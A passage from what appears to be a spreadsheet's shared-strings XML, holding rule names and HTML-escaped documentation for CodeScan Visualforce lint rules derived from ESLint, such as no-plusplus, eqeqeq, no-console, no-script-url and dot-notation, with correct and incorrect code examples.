    <t>disallow the unary operators `++` and `--`</t>
  </si>
  <si>
    <t>&lt;p&gt;Because the unary &lt;code&gt;++&lt;/code&gt; and &lt;code&gt;--&lt;/code&gt; operators are subject to automatic semicolon insertion, differences in whitespace can change semantics of source code.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var i = 10;
var j = 20;
i ++
j
// i = 11, j = 20
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var i = 10;
var j = 20;
i
++
j
// i = 10, j = 21
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule disallows the unary operators &lt;code&gt;++&lt;/code&gt; and &lt;code&gt;--&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-plusplus: "error"*/
var foo = 0;
foo++;
var bar = 42;
bar--;
for (i = 0; i &amp;lt; l; i++) {
    return;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-plusplus: "error"*/
var foo = 0;
foo += 1;
var bar = 42;
bar -= 1;
for (i = 0; i &amp;lt; l; i += 1) {
    return;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;p&gt;This rule has an object option.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;"allowForLoopAfterthoughts": true&lt;/code&gt; allows unary operators &lt;code&gt;++&lt;/code&gt; and &lt;code&gt;--&lt;/code&gt; in the afterthought (final expression) of a &lt;code&gt;for&lt;/code&gt; loop.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="allowforloopafterthoughts"&gt;allowForLoopAfterthoughts&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "allowForLoopAfterthoughts": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-plusplus: ["error", { "allowForLoopAfterthoughts": true }]*/
for (i = 0; i &amp;lt; l; i++) {
    return;
}
for (i = 0; i &amp;lt; l; i--) {
    return;
}
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-script-url</t>
  </si>
  <si>
    <t>disallow `javascript:` urls</t>
  </si>
  <si>
    <t>&lt;p&gt;Using &lt;code&gt;javascript:&lt;/code&gt; URLs is considered by some as a form of &lt;code&gt;eval&lt;/code&gt;. Code passed in &lt;code&gt;javascript:&lt;/code&gt; URLs has to be parsed and evaluated by the browser in the same way that &lt;code&gt;eval&lt;/code&gt; is processed.   Code should be written to work with a CSP policy that bans 'eval' as well as unsafe-inline scripts such as &lt;code&gt;javascript:&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-script-url: "error"*/
location.href = "javascript:void(0)";
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="compatibility"&gt;Compatibility&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;JSHint&lt;/strong&gt;: This rule corresponds to &lt;code&gt;scripturl&lt;/code&gt; rule of JSHint.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://stackoverflow.com/questions/13497971/what-is-the-matter-with-script-targeted-urls"&gt;What is the matter with script-targeted URLs?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>vf:InputImgWithoutAltCheck</t>
  </si>
  <si>
    <t>Image Buttons Should Have an "alt" Attribute</t>
  </si>
  <si>
    <t>&lt;p&gt;
The &lt;code&gt;alt&lt;/code&gt; attribute provides a textual alternative to an image.
It is used whenever the actual image cannot be rendered.
Common reasons for that include:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;The image can no longer be found&lt;/li&gt;
  &lt;li&gt;Slow internet connections, while waiting for the image to download&lt;/li&gt;
  &lt;li&gt;Visually impaired users using a screen reader software&lt;/li&gt;
  &lt;li&gt;Images loading is disabled, e.g. to reduce data consumption on mobile phones&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The following code illustrates this rule:&lt;/p&gt;
&lt;pre&gt;
&lt;pre&gt;
&amp;lt;input type="image" src="foo.png" /&amp;gt;                            //Bad: this is not recommended.
&amp;lt;input type="image" src="foo.png" alt="..." /&amp;gt;                  //Good: this is preferred.
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:XPathRule</t>
  </si>
  <si>
    <t>CodeScan provides a very handy method for creating new rules by writing an XPath query. When the XPath query finds a match, a violation is created.
    Let's take a simple example : assume we only want a single form on each Visualforce page. 
    We'd like to report a violation for every form after the first. Consider the following page:
&lt;pre&gt;
&amp;lt;apex:page&amp;gt;
  &amp;lt;apex:form&amp;gt;
  &amp;lt;/apex:form&amp;gt;
  &amp;lt;apex:form&amp;gt; 
  &amp;lt;/apex:form&amp;gt;
&amp;lt;/apex:page&amp;gt;
&lt;/pre&gt;
  The following expression does the magic we need:
&lt;pre&gt;
 (//Element [@Name='apex:form'])[position()&gt; 1]
&lt;/pre&gt;
  See our &lt;a href="https://knowledgebase.autorabit.com/codescan/docs/creating-custom-rules-with-xpath-for-codescan-cloud/"&gt;Custom Rules tutorial&lt;/a&gt; for more information.</t>
  </si>
  <si>
    <t>cs-vf:eqeqeq</t>
  </si>
  <si>
    <t>require the use of `===` and `!==`</t>
  </si>
  <si>
    <t>&lt;p&gt;It is considered good practice to use the type-safe equality operators &lt;code&gt;===&lt;/code&gt; and &lt;code&gt;!==&lt;/code&gt; instead of their regular counterparts &lt;code&gt;==&lt;/code&gt; and &lt;code&gt;!=&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The reason for this is that &lt;code&gt;==&lt;/code&gt; and &lt;code&gt;!=&lt;/code&gt; do type coercion which follows the rather obscure &lt;a href="https://www.ecma-international.org/ecma-262/5.1/#sec-11.9.3"&gt;Abstract Equality Comparison Algorithm&lt;/a&gt;.
For instance, the following statements are all considered &lt;code&gt;true&lt;/code&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;[] == false&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[] == ![]&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;3 == "03"&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If one of those occurs in an innocent-looking statement such as &lt;code&gt;a == b&lt;/code&gt; the actual problem is very difficult to spot.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule is aimed at eliminating the type-unsafe equality operators.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint eqeqeq: "error"*/
if (x == 42) { }
if ("" == text) { }
if (obj.getStuff() != undefined) { }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;--fix&lt;/code&gt; option on the command line automatically fixes some problems reported by this rule. A problem is only fixed if one of the operands is a &lt;code&gt;typeof&lt;/code&gt; expression, or if both operands are literals with the same type.&lt;/p&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;h3 id="always"&gt;always&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;"always"&lt;/code&gt; option (default) enforces the use of &lt;code&gt;===&lt;/code&gt; and &lt;code&gt;!==&lt;/code&gt; in every situation (except when you opt-in to more specific handling of &lt;code&gt;null&lt;/code&gt; [see below]).&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;"always"&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint eqeqeq: ["error", "always"]*/
a == b
foo == true
bananas != 1
value == undefined
typeof foo == 'undefined'
'hello' != 'world'
0 == 0
true == true
foo == null
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;"always"&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint eqeqeq: ["error", "always"]*/
a === b
foo === true
bananas !== 1
value === undefined
typeof foo === 'undefined'
'hello' !== 'world'
0 === 0
true === true
foo === null
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This rule optionally takes a second argument, which should be an object with the following supported properties:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;"null"&lt;/code&gt;: Customize how this rule treats &lt;code&gt;null&lt;/code&gt; literals. Possible values:&lt;ul&gt;
&lt;li&gt;&lt;code&gt;always&lt;/code&gt; (default) - Always use === or !==.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;never&lt;/code&gt; - Never use === or !== with &lt;code&gt;null&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ignore&lt;/code&gt; - Do not apply this rule to &lt;code&gt;null&lt;/code&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="smart"&gt;smart&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;"smart"&lt;/code&gt; option enforces the use of &lt;code&gt;===&lt;/code&gt; and &lt;code&gt;!==&lt;/code&gt; except for these cases:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Comparing two literal values&lt;/li&gt;
&lt;li&gt;Evaluating the value of &lt;code&gt;typeof&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Comparing against &lt;code&gt;null&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;"smart"&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint eqeqeq: ["error", "smart"]*/
// comparing two variables requires ===
a == b
// only one side is a literal
foo == true
bananas != 1
// comparing to undefined requires ===
value == undefined
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;"smart"&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint eqeqeq: ["error", "smart"]*/
typeof foo == 'undefined'
'hello' != 'world'
0 == 0
true == true
foo == null
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="allownull"&gt;allow-null&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Deprecated:&lt;/strong&gt; Instead of using this option use "always" and pass a "null" option property with value "ignore". This will tell ESLint to always enforce strict equality except when comparing with the &lt;code&gt;null&lt;/code&gt; literal.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;["error", "always", {"null": "ignore"}]
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you don't want to enforce a style for using equality operators, then it's safe to disable this rule.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-console</t>
  </si>
  <si>
    <t>disallow the use of `console`</t>
  </si>
  <si>
    <t>&lt;p&gt;In JavaScript that is designed to be executed in the browser, it's considered a best practice to avoid using methods on &lt;code&gt;console&lt;/code&gt;. Such messages are considered to be for debugging purposes and therefore not suitable to ship to the client. In general, calls using &lt;code&gt;console&lt;/code&gt; should be stripped before being pushed to production.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;console.log("Made it here.");
console.error("That shouldn't have happened.");
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule disallows calls to methods of the &lt;code&gt;console&lt;/code&gt; object.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-console: "error"*/
console.log("Log a debug level message.");
console.warn("Log a warn level message.");
console.error("Log an error level message.");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-console: "error"*/
// custom console
Console.log("Hello world!");
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;p&gt;This rule has an object option for exceptions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;"allow"&lt;/code&gt; has an array of strings which are allowed methods of the &lt;code&gt;console&lt;/code&gt; object&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Examples of additional &lt;strong&gt;correct&lt;/strong&gt; code for this rule with a sample &lt;code&gt;{ "allow": ["warn", "error"] }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-console: ["error", { allow: ["warn", "error"] }] */
console.warn("Log a warn level message.");
console.error("Log an error level message.");
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you're using Node.js, however, &lt;code&gt;console&lt;/code&gt; is used to output information to the user and so is not strictly used for debugging purposes. If you are developing for Node.js then you most likely do not want this rule enabled.&lt;/p&gt;
&lt;p&gt;Another case where you might not use this rule is if you want to enforce console calls and not console overwrites. For example:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-console: ["error", { allow: ["warn"] }] */
console.error = function (message) {
  throw new Error(message);
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With the &lt;code&gt;no-console&lt;/code&gt; rule in the above example, ESLint will report an error. For the above example, you can disable the rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;// eslint-disable-next-line no-console
console.error = function (message) {
  throw new Error(message);
};
// or
console.error = function (message) {  // eslint-disable-line no-console
  throw new Error(message);
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, you might not want to manually add &lt;code&gt;eslint-disable-next-line&lt;/code&gt; or &lt;code&gt;eslint-disable-line&lt;/code&gt;. You can achieve the effect of only receiving errors for console calls with the &lt;code&gt;no-restricted-syntax&lt;/code&gt; rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="json language-json"&gt;{
    "rules": {
        "no-console": "off",
        "no-restricted-syntax": [
            "error",
            {
                "selector": "CallExpression[callee.object.name='console'][callee.property.name!=/^(log|warn|error|info|trace)$/]",
                "message": "Unexpected property on console object was called"
            }
        ]
    }
}
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:secure-window</t>
  </si>
  <si>
    <t>validate window global access</t>
  </si>
  <si>
    <t>&lt;p&gt;This rule makes sure that only supported properties and functions are used to access the window global.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;When the rule is enabled, unsupported calls or API objects are disallowed.  Your Lightning components are permitted to use:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Standard Lightning Component Framework features.&lt;/li&gt;
&lt;li&gt;Standard Javascript features.&lt;/li&gt;
&lt;li&gt;Standard Locker Service SecureObject object features. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All disallowed uses are shown in red on this &lt;a href="http://documentation.auraframework.org/lockerApiTest/index.app?aura.mode=DEV"&gt;Window vs SecureWindow Compatibility Table&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;window.top;  //The use of window.top is disallowed.
window.setImmediate(); //The use of window.setImmediate() is disallowed.
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:unknown</t>
  </si>
  <si>
    <t>CodeScan Other Rules</t>
  </si>
  <si>
    <t>&lt;p&gt;This is reserved for future rules and expansion of the plugin. Do not turn this off.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:valid-typeof</t>
  </si>
  <si>
    <t>enforce comparing `typeof` expressions against valid strings</t>
  </si>
  <si>
    <t>&lt;p&gt;For a vast majority of use cases, the result of the &lt;code&gt;typeof&lt;/code&gt; operator is one of the following string literals: &lt;code&gt;"undefined"&lt;/code&gt;, &lt;code&gt;"object"&lt;/code&gt;, &lt;code&gt;"boolean"&lt;/code&gt;, &lt;code&gt;"number"&lt;/code&gt;, &lt;code&gt;"string"&lt;/code&gt;, &lt;code&gt;"function"&lt;/code&gt; and &lt;code&gt;"symbol"&lt;/code&gt;. It is usually a typing mistake to compare the result of a &lt;code&gt;typeof&lt;/code&gt; operator to other string literals.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule enforces comparing &lt;code&gt;typeof&lt;/code&gt; expressions to valid string literals.&lt;/p&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;p&gt;This rule has an object option:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;"requireStringLiterals": true&lt;/code&gt; requires &lt;code&gt;typeof&lt;/code&gt; expressions to only be compared to string literals or other &lt;code&gt;typeof&lt;/code&gt; expressions, and disallows comparisons to any other value.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint valid-typeof: "error"*/
typeof foo === "strnig"
typeof foo == "undefimed"
typeof bar != "nunber"
typeof bar !== "function"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint valid-typeof: "error"*/
typeof foo === "string"
typeof bar == "undefined"
typeof foo === baz
typeof bar === typeof qux
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code with the &lt;code&gt;{ "requireStringLiterals": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;typeof foo === undefined
typeof bar == Object
typeof baz === "strnig"
typeof qux === "some invalid type"
typeof baz === anotherVariable
typeof foo == 5
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code with the &lt;code&gt;{ "requireStringLiterals": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;typeof foo === "undefined"
typeof bar == "object"
typeof baz === "string"
typeof bar === typeof qux
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;You may want to turn this rule off if you will be using the &lt;code&gt;typeof&lt;/code&gt; operator on host objects.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-iterator</t>
  </si>
  <si>
    <t>disallow the use of the `__iterator__` property</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;__iterator__&lt;/code&gt; property was a SpiderMonkey extension to JavaScript that could be used to create custom iterators that are compatible with JavaScript's &lt;code&gt;for in&lt;/code&gt; and &lt;code&gt;for each&lt;/code&gt; constructs. However, this property is now obsolete, so it should not be used. Here's an example of how this used to work:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;Foo.prototype.__iterator__ = function() {
    return new FooIterator(this);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You should use ECMAScript 6 iterators and generators instead.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule is aimed at preventing errors that may arise from using the &lt;code&gt;__iterator__&lt;/code&gt; property, which is not implemented in several browsers. As such, it will warn whenever it encounters the &lt;code&gt;__iterator__&lt;/code&gt; property.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-iterator: "error"*/
Foo.prototype.__iterator__ = function() {
    return new FooIterator(this);
};
foo.__iterator__ = function () {};
foo["__iterator__"] = function () {};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-iterator: "error"*/
var __iterator__ = foo; // Not using the `__iterator__` property.
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Iterators_and_Generators"&gt;MDN - Iterators and Generators&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://kangax.github.io/es5-compat-table/es6/#Iterators"&gt;ECMAScript 6 compatibility table - Iterators&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Deprecated_and_obsolete_features#Object_methods"&gt;Deprecated and Obsolete Features&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-empty-character-class</t>
  </si>
  <si>
    <t>disallow empty character classes in regular expressions</t>
  </si>
  <si>
    <t>&lt;p&gt;Because empty character classes in regular expressions do not match anything, they might be typing mistakes.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var foo = /^abc[]/;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule disallows empty character classes in regular expressions.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-empty-character-class: "error"*/
/^abc[]/.test("abcdefg"); // false
"abcdefg".match(/^abc[]/); // null
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-empty-character-class: "error"*/
/^abc/.test("abcdefg"); // true
"abcdefg".match(/^abc/); // ["abc"]
/^abc[a-z]/.test("abcdefg"); // true
"abcdefg".match(/^abc[a-z]/); // ["abcd"]
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="knownlimitations"&gt;Known Limitations&lt;/h2&gt;
&lt;p&gt;This rule does not report empty character classes in the string argument of calls to the &lt;code&gt;RegExp&lt;/code&gt; constructor.&lt;/p&gt;
&lt;p&gt;Example of a &lt;em&gt;false negative&lt;/em&gt; when this rule reports correct code:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-empty-character-class: "error"*/
var abcNeverMatches = new RegExp("^abc[]");
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-constant-condition</t>
  </si>
  <si>
    <t>disallow constant expressions in conditions</t>
  </si>
  <si>
    <t>&lt;p&gt;A constant expression (for example, a literal) as a test condition might be a typo or development trigger for a specific behavior. For example, the following code looks as if it is not ready for production.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;if (false) {
    doSomethingUnfinished();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule disallows constant expressions in the test condition of:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;if&lt;/code&gt;, &lt;code&gt;for&lt;/code&gt;, &lt;code&gt;while&lt;/code&gt;, or &lt;code&gt;do...while&lt;/code&gt; statement&lt;/li&gt;
&lt;li&gt;&lt;code&gt;?:&lt;/code&gt; ternary expression&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-constant-condition: "error"*/
if (false) {
    doSomethingUnfinished();
}
if (void x) {
    doSomethingUnfinished();
}
for (;-2;) {
    doSomethingForever();
}
while (typeof x) {
    doSomethingForever();
}
do {
    doSomethingForever();
} while (x = -1);
var result = 0 ? a : b;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-constant-condition: "error"*/
if (x === 0) {
    doSomething();
}
for (;;) {
    doSomethingForever();
}
while (typeof x === "undefined") {
    doSomething();
}
do {
    doSomething();
} while (x);
var result = x !== 0 ? a : b;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;h3 id="checkloops"&gt;checkLoops&lt;/h3&gt;
&lt;p&gt;Set to &lt;code&gt;true&lt;/code&gt; by default. Setting this option to &lt;code&gt;false&lt;/code&gt; allows constant expressions in loops.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for when &lt;code&gt;checkLoops&lt;/code&gt; is &lt;code&gt;false&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-constant-condition: ["error", { "checkLoops": false }]*/
while (true) {
    doSomething();
    if (condition()) {
        break;
    }
};
for (;true;) {
    doSomething();
    if (condition()) {
        break;
    }
};
do {
    doSomething();
    if (condition()) {
        break;
    }
} while (true)
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:dot-notation</t>
  </si>
  <si>
    <t>enforce dot notation</t>
  </si>
  <si>
    <t>&lt;p&gt;In JavaScript, one can access properties using the dot notation (&lt;code&gt;foo.bar&lt;/code&gt;) or square-bracket notation (&lt;code&gt;foo["bar"]&lt;/code&gt;). However, the dot notation is often preferred because it is easier to read, less verbose, and works better with aggressive JavaScript minimizers.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;foo["bar"];
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule is aimed at maintaining code consistency and improving code readability by encouraging use of the dot notation style whenever possible. As such, it will warn when it encounters an unnecessary use of square-bracket notation.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint dot-notation: "error"*/
var x = foo["bar"];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint dot-notation: "error"*/
var x = foo.bar;
var x = foo[bar];    // Property name is a variable, square-bracket notation required
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;p&gt;This rule accepts a single options argument:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Set the &lt;code&gt;allowKeywords&lt;/code&gt; option to &lt;code&gt;false&lt;/code&gt; (default is &lt;code&gt;true&lt;/code&gt;) to follow ECMAScript version 3 compatible style, avoiding dot notation for reserved word properties.&lt;/li&gt;
&lt;li&gt;Set the &lt;code&gt;allowPattern&lt;/code&gt; option to a regular expression string to allow bracket notation for property names that match a pattern (by default, no pattern is tested).&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="allowkeywords"&gt;allowKeywords&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;{ "allowKeywords": false }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint dot-notation: ["error", { "allowKeywords": false }]*/
var foo = { "class": "CS 101" }
var x = foo["class"]; // Property name is a reserved word, square-bracket notation required
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="allowpattern"&gt;allowPattern&lt;/h3&gt;
&lt;p&gt;For example, when preparing data to be sent to an external API, it is often required to use property names that include underscores.  If the &lt;code&gt;camelcase&lt;/code&gt; rule is in effect, these &lt;a href="https://en.wikipedia.org/wiki/Snake_case"&gt;snake case&lt;/a&gt; properties would not be allowed.  By providing an &lt;code&gt;allowPattern&lt;/code&gt; to the &lt;code&gt;dot-notation&lt;/code&gt; rule, these snake case properties can be accessed with bracket notation.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the sample &lt;code&gt;{ "allowPattern": "^[a-z]+(_[a-z]+)+$" }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint camelcase: "error"*/
